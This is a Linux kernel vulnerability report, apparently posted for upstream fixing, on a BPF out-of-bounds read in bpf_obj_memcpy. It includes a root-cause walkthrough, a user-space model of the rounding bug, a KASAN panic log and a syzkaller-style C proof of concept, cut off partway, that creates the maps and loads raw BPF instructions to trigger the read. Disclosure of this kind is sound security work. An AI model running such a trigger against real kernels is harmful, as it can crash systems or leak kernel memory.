Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>
## Root Cause
The out-of-bounds read can be triggered by a specially crafted BPF program that performs the following sequence of operations:
1. A BPF program prepares a data buffer of a size that is not a multiple of 8 (e.g., 4 bytes). This can be done by getting a pointer to a value from another map, for instance a `BPF_MAP_TYPE_CGROUP_STORAGE` map (`map1`) with `value_size = 4`.
2. This pointer (to the 4-byte buffer) is passed as the `value` argument to `bpf_map_update_elem` for a `BPF_MAP_TYPE_LRU_PERCPU_HASH` map (`map2`), which also has `value_size = 4`.
3. The map update operation triggers the call chain: `__htab_lru_percpu_map_update_elem` -> `pcpu_init_value` -> `copy_map_value_long` -> `bpf_obj_memcpy`.
4. `copy_map_value_long` invokes `bpf_obj_memcpy` with `long_memcpy` set to `true` and a `size` of 4 (from `map2->value_size`).
5. Inside `bpf_obj_memcpy`, because `long_memcpy` is true, it calls `bpf_long_memcpy` with a size rounded up to 8 bytes: `bpf_long_memcpy(dst, src, round_up(4, 8))`.
6. `bpf_long_memcpy` then attempts to read 8 bytes from the source pointer, but the source buffer is only 4 bytes long. This results in an out-of-bounds read of 4 bytes, triggering a KASAN error. The pointer arithmetic in the original PoC is not necessary to trigger the vulnerability.
### Execution Flow Visualization
```
Vulnerability Execution Flow
|
|--- 1. BPF program obtains a pointer to a 4-byte buffer
|     |
|     `-- bpf_get_local_storage(map1) -> src_ptr (points to 4-byte cgroup storage value)
|
|--- 2. BPF program updates a different map with this pointer
|     |
|     `-- bpf_map_update_elem(map2, key, src_ptr, flags)
|           |
|           `-> map2 is of type BPF_MAP_TYPE_LRU_PERCPU_HASH with value_size = 4
|
`--- 3. Kernel space: Map update process
      |
      `-- __htab_lru_percpu_map_update_elem()
            |
            `-- pcpu_init_value()
                  |
                  `-- copy_map_value_long()
                        |
                        `-- bpf_obj_memcpy(..., src_ptr, size=4, long_memcpy=true)
                              |
                              |--> rounded_size = round_up(4, 8) // rounded_size is 8
                              |
                              `-- bpf_long_memcpy(..., src_ptr, rounded_size=8)
                                    |
                                    `-> Attempts to read 8 bytes from src_ptr, which is only 4 bytes long.
                                          |
                                          `-> CRASH: Out-of-bounds read occurs here.
```
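As an added illustration of the rounding described above (not code from this report or from the kernel), the following user-space model reproduces the arithmetic on the report's own geometry: a 20-byte cgroup-storage allocation in a 32-byte slab slot with the 4-byte value at offset 16. `read_in_bounds` stands in for KASAN, and `safe_obj_memcpy` is a hypothetical hardened copy for comparison, not the kernel's fix.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define round_up(x, y) ((((x) + (y) - 1) / (y)) * (y))

/* Minimal stand-in for KASAN's slab bounds check (constructed for this
 * example): an allocation records the byte range it owns and every model
 * read is validated against it. */
struct alloc {
    const uint8_t *base;
    size_t size;
};

static int oob_reads;          /* out-of-bounds reads detected so far */
static size_t last_oob_bytes;  /* how far the last bad read ran past the object */

static bool read_in_bounds(const struct alloc *a, const void *p, size_t n)
{
    const uint8_t *q = p;

    if (q < a->base || q + n > a->base + a->size) {
        oob_reads++;
        last_oob_bytes = (size_t)((q + n) - (a->base + a->size));
        return false;
    }
    return true;
}

/* Model of bpf_long_memcpy(): copies in 8-byte words, so it always reads a
 * multiple of 8 bytes from src. The check is where KASAN would fire. */
static void model_long_memcpy(uint64_t *dst, const struct alloc *src,
                              const void *srcp, uint32_t size)
{
    const uint64_t *wsrc = srcp;
    uint32_t i;

    for (i = 0; i < size / sizeof(uint64_t); i++) {
        read_in_bounds(src, &wsrc[i], sizeof(uint64_t));
        dst[i] = wsrc[i];
    }
}

/* Model of the bpf_obj_memcpy() path with long_memcpy=true: the length is
 * rounded up to 8 before the word copy, so size=4 reads 8 bytes. */
static void model_obj_memcpy_long(uint64_t *dst, const struct alloc *src,
                                  const void *srcp, uint32_t size)
{
    model_long_memcpy(dst, src, srcp, round_up(size, 8));
}

/* Hardened variant (an assumption for illustration, not the kernel's fix):
 * whole words are copied word-wise and the tail byte-wise, so no read goes
 * past size bytes. */
static void safe_obj_memcpy(uint64_t *dst, const struct alloc *src,
                            const void *srcp, uint32_t size)
{
    uint32_t words = size - size % sizeof(uint64_t);
    const uint8_t *bsrc = srcp;
    uint32_t i;

    model_long_memcpy(dst, src, srcp, words);
    for (i = words; i < size; i++) {
        read_in_bounds(src, &bsrc[i], 1);
        ((uint8_t *)dst)[i] = bsrc[i];
    }
}

/* Reproduces the report's geometry: a 20-byte cgroup-storage allocation in
 * a 32-byte kmalloc-cg-32 slot, with the 4-byte value at offset 16, copied
 * into a percpu slot sized round_up(4, 8) = 8. Returns how many bytes were
 * read past the allocation (0 when the copy stayed in bounds). */
static size_t run_model(bool hardened)
{
    union { uint64_t words[4]; uint8_t bytes[32]; } slot = { { 0 } };
    struct alloc storage = { slot.bytes, 20 };       /* constructed object */
    const uint8_t *value = slot.bytes + 16;          /* map1->value_size = 4 */
    uint64_t percpu_value[1] = { 0 };

    memcpy(slot.bytes + 16, "\xaa\xbb\xcc\xdd", 4);  /* constructed value */
    oob_reads = 0;
    last_oob_bytes = 0;
    if (hardened)
        safe_obj_memcpy(percpu_value, &storage, value, 4);
    else
        model_obj_memcpy_long(percpu_value, &storage, value, 4);
    return oob_reads ? last_oob_bytes : 0;
}
```

The buggy path overruns the 20-byte allocation by exactly the 4 bytes the KASAN report shows; the hardened path performs the same copy without any read past the object.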
## Reproduction Steps
1. **Map Creation**: Create two BPF maps:
   * `map1`: A map from which a source buffer can be obtained, e.g., `BPF_MAP_TYPE_CGROUP_STORAGE`, with `value_size = 4`.
   * `map2`: A `BPF_MAP_TYPE_LRU_PERCPU_HASH` map with `value_size = 4`.
2. **Program Setup**: Load a BPF program that performs the following logic:
   a. Calls `bpf_get_local_storage` on `map1` to get a pointer to the 4-byte value.
   b. Calls `bpf_map_update_elem` on `map2`, passing the pointer from step (a) as the `value`.
3. **Trigger**: Run the BPF program using the `BPF_PROG_TEST_RUN` command. The out-of-bounds read occurs during the `bpf_map_update_elem` helper call within the program's execution.
## KASAN Report
```
[ 329.363954][ T9950] ==================================================================
[ 329.364725][ T9950] BUG: KASAN: slab-out-of-bounds in bpf_obj_memcpy+0x257/0x2b0
[ 329.365445][ T9950] Read of size 8 at addr ff11000044c22c90 by task poc/9950
[ 329.366119][ T9950]
[ 329.366354][ T9950] CPU: 1 UID: 0 PID: 9950 Comm: poc Not tainted 6.19.0-rc5-gae23bc81ddf7 #2 PREEMPT(full)
[ 329.366378][ T9950] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 329.366385][ T9950] Call Trace:
[ 329.366390][ T9950] <TASK>
[ 329.366396][ T9950] dump_stack_lvl+0x116/0x1b0
[ 329.366419][ T9950] print_report+0xca/0x5f0
[ 329.366440][ T9950] ? __phys_addr+0xf0/0x180
[ 329.366453][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.366466][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.366479][ T9950] kasan_report+0xca/0x100
[ 329.366495][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.366511][ T9950] bpf_obj_memcpy+0x257/0x2b0
[ 329.366524][ T9950] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 329.366540][ T9950] ? bpf_lru_pop_free+0x26f/0x1720
[ 329.366555][ T9950] pcpu_init_value.part.0+0x3da/0x4c0
[ 329.366573][ T9950] __htab_lru_percpu_map_update_elem+0x6e2/0xa40
[ 329.366592][ T9950] ? __pfx___htab_lru_percpu_map_update_elem+0x10/0x10
[ 329.366610][ T9950] ? kvm_clock_get_cycles+0x3f/0x70
[ 329.366624][ T9950] ? ktime_get+0x1cc/0x300
[ 329.366643][ T9950] bpf_prog_8fdc57b6fcadb4dd+0x4e/0x5a
[ 329.366654][ T9950] bpf_test_run+0x44a/0xd50
[ 329.366674][ T9950] ? __pfx_bpf_test_run+0x10/0x10
[ 329.366690][ T9950] ? lockdep_hardirqs_on+0x7c/0x110
[ 329.366705][ T9950] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 329.366721][ T9950] ? __pfx___debug_object_init+0x10/0x10
[ 329.366739][ T9950] ? rcu_is_watching+0x12/0xc0
[ 329.366752][ T9950] ? __phys_addr+0xf0/0x180
[ 329.366765][ T9950] ? kasan_save_track+0x14/0x30
[ 329.366778][ T9950] ? __kasan_krealloc+0xf6/0x170
[ 329.366794][ T9950] ? krealloc_node_align_noprof+0x276/0x3e0
[ 329.366811][ T9950] ? eth_type_trans+0x2ea/0x760
[ 329.366830][ T9950] bpf_prog_test_run_skb+0xfe3/0x3190
[ 329.366847][ T9950] ? __lock_acquire+0x490/0x2610
[ 329.366869][ T9950] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 329.366887][ T9950] ? __might_fault+0xe5/0x190
[ 329.366901][ T9950] ? fdget+0x17f/0x220
[ 329.366913][ T9950] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 329.366931][ T9950] __sys_bpf+0x15cd/0x5610
[ 329.366944][ T9950] ? __pfx___sys_bpf+0x10/0x10
[ 329.366956][ T9950] ? __lock_acquire+0x490/0x2610
[ 329.366971][ T9950] ? css_rstat_updated+0x1c5/0x570
[ 329.366989][ T9950] ? __pfx_css_rstat_updated+0x10/0x10
[ 329.367017][ T9950] __x64_sys_bpf+0x7d/0xc0
[ 329.367028][ T9950] ? lockdep_hardirqs_on+0x7c/0x110
[ 329.367044][ T9950] do_syscall_64+0xcb/0xf80
[ 329.367060][ T9950] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 329.367073][ T9950] RIP: 0033:0x7f9a587a97d9
[ 329.367083][ T9950] Code: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f8
[ 329.367095][ T9950] RSP: 002b:00007ffef1808c58 EFLAGS: 00000287 ORIG_RAX: 0000000000000141
[ 329.367108][ T9950] RAX: ffffffffffffffda RBX: 00007ffef1808d88 RCX: 00007f9a587a97d9
[ 329.367116][ T9950] RDX: 0000000000000050 RSI: 0000200000003a00 RDI: 000000000000000a
[ 329.367123][ T9950] RBP: 00007ffef1808c70 R08: 0000000000000000 R09: 0000000000000000
[ 329.367130][ T9950] R10: 0000000000000000 R11: 0000000000000287 R12: 0000000000000000
[ 329.367138][ T9950] R13: 00007ffef1808d98 R14: 000055edb3b92dd8 R15: 00007f9a588c9020
[ 329.367151][ T9950] </TASK>
[ 329.367156][ T9950]
[ 329.396696][ T9950] Allocated by task 9950:
[ 329.397121][ T9950] kasan_save_stack+0x24/0x50
[ 329.397585][ T9950] kasan_save_track+0x14/0x30
[ 329.398034][ T9950] __kasan_kmalloc+0xaa/0xb0
[ 329.398479][ T9950] __kmalloc_node_noprof+0x357/0x970
[ 329.398978][ T9950] bpf_map_kmalloc_node+0x9b/0xf0
[ 329.399455][ T9950] bpf_cgroup_storage_alloc+0x229/0x450
[ 329.399990][ T9950] bpf_test_run+0x130/0xd50
[ 329.400421][ T9950] bpf_prog_test_run_skb+0xfe3/0x3190
[ 329.400931][ T9950] __sys_bpf+0x15cd/0x5610
[ 329.401351][ T9950] __x64_sys_bpf+0x7d/0xc0
[ 329.401770][ T9950] do_syscall_64+0xcb/0xf80
[ 329.402202][ T9950] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 329.402786][ T9950]
[ 329.403013][ T9950] The buggy address belongs to the object at ff11000044c22c80
[ 329.403013][ T9950] which belongs to the cache kmalloc-cg-32 of size 32
[ 329.404294][ T9950] The buggy address is located 16 bytes inside of
[ 329.404294][ T9950] allocated 20-byte region [ff11000044c22c80, ff11000044c22c94)
[ 329.405554][ T9950]
[ 329.405781][ T9950] The buggy address belongs to the physical page:
[ 329.406379][ T9950] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x44c22
[ 329.407208][ T9950] memcg:ff1100004d957001
[ 329.407632][ T9950] flags: 0x4fff00000000000(node=1|zone=1|lastcpupid=0x7ff)
[ 329.408340][ T9950] page_type: f5(slab)
[ 329.408733][ T9950] raw: 04fff00000000000 ff1100001c43bb40 ffd400000117ba80 dead000000000002
[ 329.409551][ T9950] raw: 0000000000000000 0000000080400040 00000000f5000000 ff1100004d957001
[ 329.410373][ T9950] page dumped because: kasan: bad access detected
[ 329.410986][ T9950] page_owner tracks the page as allocated
[ 329.411514][ T9950] page last allocated via order 0, migratetype Unmovable, gfp_mask 0x52cc0(GFP_KERNEL|__GFP_NOWARN|__GFP_NORETRY|__GFP_COMP), pid 27, tgid 27 (kworker/u10:0), ts 115031235007
[ 329.413243][ T9950] post_alloc_hook+0x1ca/0x240
[ 329.413695][ T9950] get_page_from_freelist+0xdb8/0x2a70
[ 329.414208][ T9950] __alloc_frozen_pages_noprof+0x25b/0x20f0
[ 329.414774][ T9950] alloc_pages_mpol+0x1f6/0x550
[ 329.415242][ T9950] new_slab+0x2d5/0x440
[ 329.415639][ T9950] ___slab_alloc+0xddd/0x1bc0
[ 329.416083][ T9950] __slab_alloc.constprop.0+0x6b/0x120
[ 329.416595][ T9950] __kmalloc_noprof+0x5a7/0x960
[ 329.417054][ T9950] lsm_cred_alloc+0x7d/0xa0
[ 329.417486][ T9950] security_prepare_creds+0x2a/0x270
[ 329.417983][ T9950] prepare_creds+0x5df/0x940
[ 329.418445][ T9950] copy_creds+0xb0/0xa60
[ 329.418846][ T9950] copy_process+0x12e1/0x7460
[ 329.419291][ T9950] kernel_clone+0xef/0x890
[ 329.419715][ T9950] user_mode_thread+0xcd/0x110
[ 329.420166][ T9950] call_usermodehelper_exec_work+0xd5/0x190
[ 329.420727][ T9950] page last free pid 1 tgid 1 stack trace:
[ 329.421265][ T9950] __free_frozen_pages+0x843/0x1140
[ 329.421753][ T9950] vfree+0x238/0xb50
[ 329.422132][ T9950] bdev_disk_changed+0x668/0x1540
[ 329.422622][ T9950] blkdev_get_whole+0x18f/0x2a0
[ 329.423088][ T9950] bdev_open+0x2cc/0xe40
[ 329.423488][ T9950] bdev_file_open_by_dev+0x180/0x220
[ 329.423987][ T9950] disk_scan_partitions+0x1f4/0x330
[ 329.424480][ T9950] add_disk_fwnode+0x425/0x5f0
[ 329.424934][ T9950] brd_alloc.isra.0+0x566/0x7f0
[ 329.425394][ T9950] brd_init+0xfa/0x1e0
[ 329.425793][ T9950] do_one_initcall+0x111/0x660
[ 329.426252][ T9950] kernel_init_freeable+0x5b4/0x8c0
[ 329.426746][ T9950] kernel_init+0x23/0x2d0
[ 329.427157][ T9950] ret_from_fork+0x96b/0xaf0
[ 329.427596][ T9950] ret_from_fork_asm+0x1a/0x30
[ 329.428054][ T9950]
[ 329.428279][ T9950] Memory state around the buggy address:
[ 329.428803][ T9950] ff11000044c22b80: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc
[ 329.429543][ T9950] ff11000044c22c00: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc
[ 329.430278][ T9950] >ff11000044c22c80: 00 00 04 fc fc fc fc fc 00 00 03 fc fc fc fc fc
[ 329.431018][ T9950] ^
[ 329.431455][ T9950] ff11000044c22d00: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc
[ 329.432190][ T9950] ff11000044c22d80: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc
[ 329.432926][ T9950] ==================================================================
[ 329.433662][ T9950] Kernel panic - not syncing: KASAN: panic_on_warn set ...
[ 329.434330][ T9950] CPU: 1 UID: 0 PID: 9950 Comm: poc Not tainted 6.19.0-rc5-gae23bc81ddf7 #2 PREEMPT(full)
[ 329.435255][ T9950] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 329.436097][ T9950] Call Trace:
[ 329.436410][ T9950] <TASK>
[ 329.436693][ T9950] dump_stack_lvl+0x3d/0x1b0
[ 329.437136][ T9950] vpanic+0x67e/0x710
[ 329.437520][ T9950] panic+0xc7/0xd0
[ 329.437883][ T9950] ? __pfx_panic+0x10/0x10
[ 329.438309][ T9950] ? end_report+0x4c/0x160
[ 329.439009][ T9950] ? rcu_is_watching+0x12/0xc0
[ 329.439482][ T9950] ? lock_release+0x1fc/0x2d0
[ 329.439935][ T9950] ? check_panic_on_warn+0x24/0xc0
[ 329.440422][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.440883][ T9950] check_panic_on_warn+0xb6/0xc0
[ 329.441355][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.441817][ T9950] end_report+0x107/0x160
[ 329.442239][ T9950] kasan_report+0xd8/0x100
[ 329.442677][ T9950] ? bpf_obj_memcpy+0x257/0x2b0
[ 329.443144][ T9950] bpf_obj_memcpy+0x257/0x2b0
[ 329.443589][ T9950] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 329.444142][ T9950] ? bpf_lru_pop_free+0x26f/0x1720
[ 329.444628][ T9950] pcpu_init_value.part.0+0x3da/0x4c0
[ 329.445142][ T9950] __htab_lru_percpu_map_update_elem+0x6e2/0xa40
[ 329.445742][ T9950] ? __pfx___htab_lru_percpu_map_update_elem+0x10/0x10
[ 329.446391][ T9950] ? kvm_clock_get_cycles+0x3f/0x70
[ 329.446883][ T9950] ? ktime_get+0x1cc/0x300
[ 329.447316][ T9950] bpf_prog_8fdc57b6fcadb4dd+0x4e/0x5a
[ 329.447833][ T9950] bpf_test_run+0x44a/0xd50
[ 329.448271][ T9950] ? __pfx_bpf_test_run+0x10/0x10
[ 329.448750][ T9950] ? lockdep_hardirqs_on+0x7c/0x110
[ 329.449245][ T9950] ? _raw_spin_unlock_irqrestore+0x46/0x80
[ 329.449798][ T9950] ? __pfx___debug_object_init+0x10/0x10
[ 329.450330][ T9950] ? rcu_is_watching+0x12/0xc0
[ 329.450800][ T9950] ? __phys_addr+0xf0/0x180
[ 329.451239][ T9950] ? kasan_save_track+0x14/0x30
[ 329.451704][ T9950] ? __kasan_krealloc+0xf6/0x170
[ 329.452180][ T9950] ? krealloc_node_align_noprof+0x276/0x3e0
[ 329.452739][ T9950] ? eth_type_trans+0x2ea/0x760
[ 329.453206][ T9950] bpf_prog_test_run_skb+0xfe3/0x3190
[ 329.453752][ T9950] ? __lock_acquire+0x490/0x2610
[ 329.454229][ T9950] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 329.454789][ T9950] ? __might_fault+0xe5/0x190
[ 329.455235][ T9950] ? fdget+0x17f/0x220
[ 329.455621][ T9950] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 329.456173][ T9950] __sys_bpf+0x15cd/0x5610
[ 329.456595][ T9950] ? __pfx___sys_bpf+0x10/0x10
[ 329.457045][ T9950] ? __lock_acquire+0x490/0x2610
[ 329.457515][ T9950] ? css_rstat_updated+0x1c5/0x570
[ 329.458002][ T9950] ? __pfx_css_rstat_updated+0x10/0x10
[ 329.458542][ T9950] __x64_sys_bpf+0x7d/0xc0
[ 329.458962][ T9950] ? lockdep_hardirqs_on+0x7c/0x110
[ 329.459455][ T9950] do_syscall_64+0xcb/0xf80
[ 329.459888][ T9950] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 329.460441][ T9950] RIP: 0033:0x7f9a587a97d9
[ 329.460861][ T9950] Code: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f8
[ 329.462633][ T9950] RSP: 002b:00007ffef1808c58 EFLAGS: 00000287 ORIG_RAX: 0000000000000141
[ 329.463406][ T9950] RAX: ffffffffffffffda RBX: 00007ffef1808d88 RCX: 00007f9a587a97d9
[ 329.464138][ T9950] RDX: 0000000000000050 RSI: 0000200000003a00 RDI: 000000000000000a
[ 329.464866][ T9950] RBP: 00007ffef1808c70 R08: 0000000000000000 R09: 0000000000000000
[ 329.465601][ T9950] R10: 0000000000000000 R11: 0000000000000287 R12: 0000000000000000
[ 329.466326][ T9950] R13: 00007ffef1808d98 R14: 000055edb3b92dd8 R15: 00007f9a588c9020
[ 329.467073][ T9950] </TASK>
[ 329.467512][ T9950] Kernel Offset: disabled
```
## Proof of Concept
The following C program demonstrates the vulnerability on bpf-next (commit ae23bc81ddf7c17b663c4ed1b21e35527b0a7131).
```c
#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
#define BITMASK(bf_off,bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type,htobe,addr,val,bf_off,bf_len) *(type*)(addr) = htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[3] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
/* syzkaller-style scaffolding: reserve fixed user mappings; the bpf(2)
 * argument structures below are built at fixed addresses in the
 * 0x200000000000 region. */
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {}
/* map1: BPF_MAP_CREATE (cmd 0) with map_type = 0x13 (BPF_MAP_TYPE_CGROUP_STORAGE),
 * key_size = 8, value_size = 4. Its value is the 4-byte source buffer. */
*(uint32_t*)0x200000000840 = 0x13;
*(uint32_t*)0x200000000844 = 8;
*(uint32_t*)0x200000000848 = 0x4;
*(uint32_t*)0x20000000084c = 0;
*(uint32_t*)0x200000000850 = 0;
*(uint32_t*)0x200000000854 = 0;
*(uint32_t*)0x200000000858 = 0;
memset((void*)0x20000000085c, 0, 16);
*(uint32_t*)0x20000000086c = 0;
*(uint32_t*)0x200000000870 = 0;
*(uint32_t*)0x200000000874 = 0;
*(uint32_t*)0x200000000878 = 0;
*(uint32_t*)0x20000000087c = 0;
*(uint64_t*)0x200000000880 = 0;
*(uint32_t*)0x200000000888 = 0;
*(uint32_t*)0x20000000088c = 0;
res = syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x200000000840ul, /*size=*/0x50ul);
if (res != -1)
r[0] = res;
/* map2: BPF_MAP_CREATE (cmd 0) with map_type = 0xa (BPF_MAP_TYPE_LRU_PERCPU_HASH),
 * key_size = 4, value_size = 4, max_entries = 0x4c. */
*(uint32_t*)0x200000000c80 = 0xa;
*(uint32_t*)0x200000000c84 = 4;
*(uint32_t*)0x200000000c88 = 4;
*(uint32_t*)0x200000000c8c = 0x4c;
*(uint32_t*)0x200000000c90 = 0;
*(uint32_t*)0x200000000c94 = 0;
*(uint32_t*)0x200000000c98 = 0;
memset((void*)0x200000000c9c, 0, 16);
*(uint32_t*)0x200000000cac = 0;
*(uint32_t*)0x200000000cb0 = 0;
*(uint32_t*)0x200000000cb4 = 0;
*(uint32_t*)0x200000000cb8 = 0;
*(uint32_t*)0x200000000cbc = 0;
*(uint64_t*)0x200000000cc0 = 0;
*(uint32_t*)0x200000000cc8 = 0;
*(uint32_t*)0x200000000ccc = 0;
res = syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x200000000c80ul, /*size=*/0x50ul);
if (res != -1)
r[1] = res;
/* BPF_PROG_LOAD (cmd 5): prog_type = 8 (BPF_PROG_TYPE_CGROUP_SKB), insn_cnt = 0x10.
 * The 16 instructions below are written as raw struct bpf_insn encodings:
 * opcode, dst_reg (low nibble), src_reg (high nibble), off, imm. */
*(uint32_t*)0x200000002700 = 8;
*(uint32_t*)0x200000002704 = 0x10;
*(uint64_t*)0x200000002708 = 0x2000000027c0;
/* r6 = 0 */
*(uint8_t*)0x2000000027c0 = 0xb7;
STORE_BY_BITMASK(uint8_t, , 0x2000000027c1, 6, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027c1, 0, 4, 4);
*(uint16_t*)0x2000000027c2 = 0;
*(uint32_t*)0x2000000027c4 = 0;
/* r1 = map1 (ld_imm64 with src_reg = BPF_PSEUDO_MAP_FD, imm = map1 fd) */
*(uint8_t*)0x2000000027c8 = 0x18;
STORE_BY_BITMASK(uint8_t, , 0x2000000027c9, 1, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027c9, 1, 4, 4);
*(uint16_t*)0x2000000027ca = 0;
*(uint32_t*)0x2000000027cc = r[0];
*(uint8_t*)0x2000000027d0 = 0;
*(uint8_t*)0x2000000027d1 = 0;
*(uint16_t*)0x2000000027d2 = 0;
*(uint32_t*)0x2000000027d4 = 0;
/* r2 = 0 (flags) */
*(uint8_t*)0x2000000027d8 = 0xb7;
STORE_BY_BITMASK(uint8_t, , 0x2000000027d9, 2, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027d9, 0, 4, 4);
*(uint16_t*)0x2000000027da = 0;
*(uint32_t*)0x2000000027dc = 0;
/* call bpf_get_local_storage (helper 0x51): r0 = pointer to map1's 4-byte value */
*(uint8_t*)0x2000000027e0 = 0x85;
STORE_BY_BITMASK(uint8_t, , 0x2000000027e1, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027e1, 0, 4, 4);
*(uint16_t*)0x2000000027e2 = 0;
*(uint32_t*)0x2000000027e4 = 0x51;
/* *(u64 *)(r10 - 8) = r6: a zero key on the stack */
*(uint8_t*)0x2000000027e8 = 0x7b;
STORE_BY_BITMASK(uint8_t, , 0x2000000027e9, 0xa, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027e9, 6, 4, 4);
*(uint16_t*)0x2000000027ea = 0xfff8;
*(uint32_t*)0x2000000027ec = 0;
/* r0 = r0 (no-op) */
*(uint8_t*)0x2000000027f0 = 0xbf;
STORE_BY_BITMASK(uint8_t, , 0x2000000027f1, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027f1, 0, 4, 4);
*(uint16_t*)0x2000000027f2 = 0;
*(uint32_t*)0x2000000027f4 = 0;
/* r2 = r10 */
*(uint8_t*)0x2000000027f8 = 0xbf;
STORE_BY_BITMASK(uint8_t, , 0x2000000027f9, 2, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x2000000027f9, 0xa, 4, 4);
*(uint16_t*)0x2000000027fa = 0;
*(uint32_t*)0x2000000027fc = 0;
/* r2 += -8: r2 now points at the key */
*(uint8_t*)0x200000002800 = 7;
STORE_BY_BITMASK(uint8_t, , 0x200000002801, 2, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002801, 0, 4, 4);
*(uint16_t*)0x200000002802 = 0;
*(uint32_t*)0x200000002804 = 0xfffffff8;
/* r1 = map2 (ld_imm64 with src_reg = BPF_PSEUDO_MAP_FD, imm = map2 fd) */
*(uint8_t*)0x200000002808 = 0x18;
STORE_BY_BITMASK(uint8_t, , 0x200000002809, 1, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002809, 1, 4, 4);
*(uint16_t*)0x20000000280a = 0;
*(uint32_t*)0x20000000280c = r[1];
*(uint8_t*)0x200000002810 = 0;
*(uint8_t*)0x200000002811 = 0;
*(uint16_t*)0x200000002812 = 0;
*(uint32_t*)0x200000002814 = 0;
/* r3 = r0: the 4-byte local-storage pointer becomes the value argument */
*(uint8_t*)0x200000002818 = 0xbf;
STORE_BY_BITMASK(uint8_t, , 0x200000002819, 3, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002819, 0, 4, 4);
*(uint16_t*)0x20000000281a = 0;
*(uint32_t*)0x20000000281c = 0;
/* r4 = 0 (flags) */
*(uint8_t*)0x200000002820 = 0xb7;
STORE_BY_BITMASK(uint8_t, , 0x200000002821, 4, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002821, 0, 4, 4);
*(uint16_t*)0x200000002822 = 0;
*(uint32_t*)0x200000002824 = 0;
/* call bpf_map_update_elem (helper 2): the 8-byte read of the 4-byte value happens here */
*(uint8_t*)0x200000002828 = 0x85;
STORE_BY_BITMASK(uint8_t, , 0x200000002829, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002829, 0, 4, 4);
*(uint16_t*)0x20000000282a = 0;
*(uint32_t*)0x20000000282c = 2;
/* r0 = 1 */
*(uint8_t*)0x200000002830 = 0xb7;
STORE_BY_BITMASK(uint8_t, , 0x200000002831, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x200000002831, 0, 4, 4);
*(uint16_t*)0x200000002832 = 0;
*(uint32_t*)0x200000002834 = 1;
/* exit */
*(uint8_t*)0x200000002838 = 0x95;
